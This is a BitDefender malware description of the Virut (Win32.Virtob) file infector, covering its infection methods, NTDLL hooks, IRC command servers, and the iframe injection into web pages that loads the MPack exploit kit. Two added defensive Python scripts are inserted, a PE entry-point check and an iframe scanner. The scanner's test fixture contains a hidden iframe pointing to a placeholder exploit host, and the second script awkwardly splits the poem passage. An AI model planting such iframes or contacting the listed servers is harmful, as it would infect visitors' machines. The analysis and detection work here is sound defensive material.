Win32.Virtob.{2,3,4}.Gen
First posted on 21 November 2011.
Source: BitDefender
Aliases:
Win32.Virtob.{2,3,4}.Gen is also known as Generic.Virtob.1, Win32.Virut, W32/Virut, Virus.Win32.Virut, Virus:Win32/Virut, W32.Virut, W32/Vetor.
Explanation :
This virus is a polymorphic, memory-resident file infector with backdoor behaviour.
The author spreads it by posting it on several forums as a crack for various applications or games. He also uses a "pay-per-install" affiliate program hosted at exerevenue.com: the executable that affiliates are told they must run in order to earn money is the virus itself.
Once executed, it injects itself into WINLOGON, creates a new thread in that process, and then passes execution control back to the host file so that the infected program appears to run normally.
It also hooks the following functions (exported by the NTDLL module) in each running process:
NtCreateFile
NtOpenFile
NtCreateProcess
NtCreateProcessEx
so that every time an infected process calls one of these functions, execution is passed to the virus, which infects the accessed file and then returns control to the original function. Because the redirection is patched into the in-memory image of NTDLL, comparing the first bytes of these functions in a running process with the on-disk copy of the module reveals the hooks.
It infects EXE and SCR files, using different infection techniques:
Appending to the last section of the victim and setting the Entry Point directly to the viral code.
Entry Point Obscuring (EPO): it searches for an IAT call in the code section and patches it with a call to its polymorphic decryptor.
Overwriting some bytes at the Entry Point with its decryptor.
Inserting into the slack space of the code section, if there is enough room there for its polymorphic decryptor.
Later versions (the ones detected as Win32.Virtob.6.Gen) have a single infection method (the first one in the list).
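The first (appending) method, the only one the later versions use, leaves a structural trace that does not depend on the polymorphic decryptor: the entry point is redirected into the last section, which the infector has grown and typically marked writable and executable. The following is an added example, not BitDefender's or the author's code, of a small PE header check for exactly that trace. The two sample images are constructed in the code (zero-filled headers and sections, not real programs); section names, sizes and flags are illustrative assumptions.

```python
"""Added example: heuristic for the appending infection method described above."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i  # section table follows the optional header
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rsize, rptr, _, _, _, _, sc = struct.unpack_from("<IIIIIIHHI", data, off + 8)
        sections.append({"name": name, "va": va, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "chars": sc})
    return entry_rva, sections


def scan_entry_point(data):
    """Return findings typical of an appending infector: the entry point sits in the
    last section and/or in a section that is both writable and executable.
    An empty list means nothing suspicious was seen."""
    entry_rva, sections = parse_pe(data)
    ep_sec = None
    for s in sections:
        span = max(s["vsize"], s["raw_size"])
        if s["va"] <= entry_rva < s["va"] + span:
            ep_sec = s
            break
    if ep_sec is None:
        return ["entry point 0x%x lies outside every section" % entry_rva]
    findings = []
    if len(sections) > 1 and ep_sec is sections[-1]:
        findings.append("entry point 0x%x is in the last section %r" % (entry_rva, ep_sec["name"]))
    if ep_sec["chars"] & IMAGE_SCN_MEM_WRITE and ep_sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %r is writable and executable" % ep_sec["name"])
    return findings


def build_pe(section_specs, entry_rva):
    """Construct a minimal, zero-filled PE32 image for testing (not a real program)."""
    nsec = len(section_specs)
    opt_size = 224  # size of a PE32 optional header
    e_lfanew = 0x80
    hdr_len = (e_lfanew + 4 + 20 + opt_size + 40 * nsec + 0x1FF) & ~0x1FF  # 0x200 file alignment
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)        # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)  # SectionAlignment, FileAlignment
    table, body, raw_ptr = b"", b"", hdr_len
    for name, va, size, chars in section_specs:
        rsize = (size + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name, size, va, rsize, raw_ptr, 0, 0, 0, 0, chars)
        body += b"\0" * rsize
        raw_ptr += rsize
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return image + b"\0" * (hdr_len - len(image)) + body


# Constructed samples. A normal build starts in .text; the "infected" layout mimics the
# appending method: a grown last section marked writable+executable holding the entry point.
CLEAN_PE = build_pe([(b".text", 0x1000, 0x1000, 0x60000020),
                     (b".data", 0x2000, 0x1000, 0xC0000040)], entry_rva=0x1100)
INFECTED_PE = build_pe([(b".text", 0x1000, 0x1000, 0x60000020),
                        (b".data", 0x2000, 0x1000, 0xC0000040),
                        (b".rsrc", 0x3000, 0x2000, 0xE0000040)], entry_rva=0x4800)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PE), ("infected", INFECTED_PE)):
        print(label, scan_entry_point(img) or ["no findings"])
```

This is a triage heuristic, not a verdict: some packers and protectors produce the same layout, and the EPO, entry-point-overwrite and slack-space methods described above leave the entry point in the code section, so they are not caught by this check at all.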
The virus contains checks that let it detect and evade emulators and virtual machines.
To ensure there is only one instance of it running in the system, it creates an event with one of the following names:
VT_3
VT_4
VevT
Vx_4
It avoids infecting files whose names contain the following strings:
WINC
WCUN
WC32
PSTO
It tries to connect to an IRC server and join a certain channel. The IRC server can be one of:
proxim.ircgalaxy.pl
proxima.ircgalaxy.pl
proxim.ntkrnlpa.info
ircd.zief.pl
Once it joins the channel, it waits for commands that instruct it to download several files from Internet, and then execute them.
One of these files is a second component of the virus (detected as Win32.Virtob.Dld.?). It downloads further files (other downloaders) and infects HTM, PHP and ASP files found on all fixed and removable drives, and on network shares, by inserting an IFRAME right before the BODY tag.
The IFRAME points to MPack, an exploit kit that includes exploits for:
MS06-014
MS06-006
MS06-044
MS06-071
MS06-057
WinZip ActiveX overflow
QuickTime overflow
MS07-017
They are used to download and execute a remote executable file (the latest version of the virus).
Because it infects ASP, HTM and PHP scripts on every infected machine, it can also infect scripts that serve web pages, so the potential for spreading is greater (it is effectively acting like a worm).
Some versions contain a fragment of a poem by Friedrich Nietzsche. Usually this is:
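The web-script infection described above has a fixed shape, an IFRAME placed immediately before the BODY tag, which makes it straightforward to sweep a web root or a file share for it during clean-up. The following is an added example, not code from BitDefender or the virus author, of a scanner that reports and optionally strips iframes in that position from HTM, HTML, PHP and ASP files. The sample page is constructed here, and the iframe URL is a placeholder, not a real MPack host.

```python
"""Added example: find and strip the IFRAME the downloader inserts before <body>."""
import os
import re

PAGE_EXTENSIONS = (".htm", ".html", ".php", ".asp")

# One or more IFRAME elements sitting directly in front of the <body> tag, the position
# the downloader component uses. Case-insensitive; DOTALL so a multi-line iframe matches.
IFRAME_BEFORE_BODY = re.compile(
    r"((?:<iframe\b[^>]*>.*?</iframe>\s*)+)(?=<body\b)",
    re.IGNORECASE | re.DOTALL,
)


def find_injected_iframes(text):
    """Return the iframe markup found directly before <body>, or [] if there is none."""
    return [m.group(1).strip() for m in IFRAME_BEFORE_BODY.finditer(text)]


def clean_page(text):
    """Return the page with those iframes removed; everything else is left untouched."""
    return IFRAME_BEFORE_BODY.sub("", text)


def scan_tree(root, repair=False):
    """Walk root and return (path, [markup]) for every page or script carrying the
    injection. With repair=True the cleaned content is written back in place."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PAGE_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fn)
            # surrogateescape keeps undecodable bytes intact so a repair round-trips them
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            found = find_injected_iframes(text)
            if not found:
                continue
            hits.append((path, found))
            if repair:
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(clean_page(text))
    return hits


# Constructed sample, not a real capture. The host name is a placeholder.
INFECTED_HTML = (
    "<html><head><title>Shop</title></head>\n"
    '<iframe src="http://mpack.example.invalid/in.php" width="1" height="1"'
    ' style="visibility:hidden"></iframe>\n'
    "<body>\n<p>Welcome</p>\n</body></html>\n"
)
CLEAN_HTML = "<html><head><title>Shop</title></head>\n<body>\n<p>Welcome</p>\n</body></html>\n"


def demo():
    """Self-contained run: drop the sample into a temp dir, scan with repair, re-scan.
    Returns (hits before repair, hits after repair, repaired file content)."""
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "index.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(INFECTED_HTML)
        first = scan_tree(root, repair=True)
        second = scan_tree(root)
        with open(path, encoding="utf-8") as fh:
            repaired = fh.read()
    return len(first), len(second), repaired


if __name__ == "__main__":
    before, after, _ = demo()
    print("infected files found: %d, remaining after repair: %d" % (before, after))
```

Run it only after the machine (and every other infected host with access to the share) has been disinfected, otherwise the downloader component simply re-infects the files. The pattern is deliberately narrow, matching only the position described above, so it will not find other injections, and a page that legitimately places an iframe right before its body will be flagged; review the reported hits before running with repair enabled, and keep a copy of the originals.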
O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It's late!
or:
The glacier's gray adorned itself for you
Today with roses;
The brook seeks you, and full of longing rises
The wind, the cloud, into the vaulting blue
To look for you from dizzy bird's-eye view.
It is possible that some versions are detected by BitDefender with names like:
Generic.Virtob.1.????????
DeepScan:Generic.Virtob.1.????????
Win32.Virtob.??
Note: many versions contain bugs, so not all of the described behaviour actually works as expected.
Last update 21 November 2011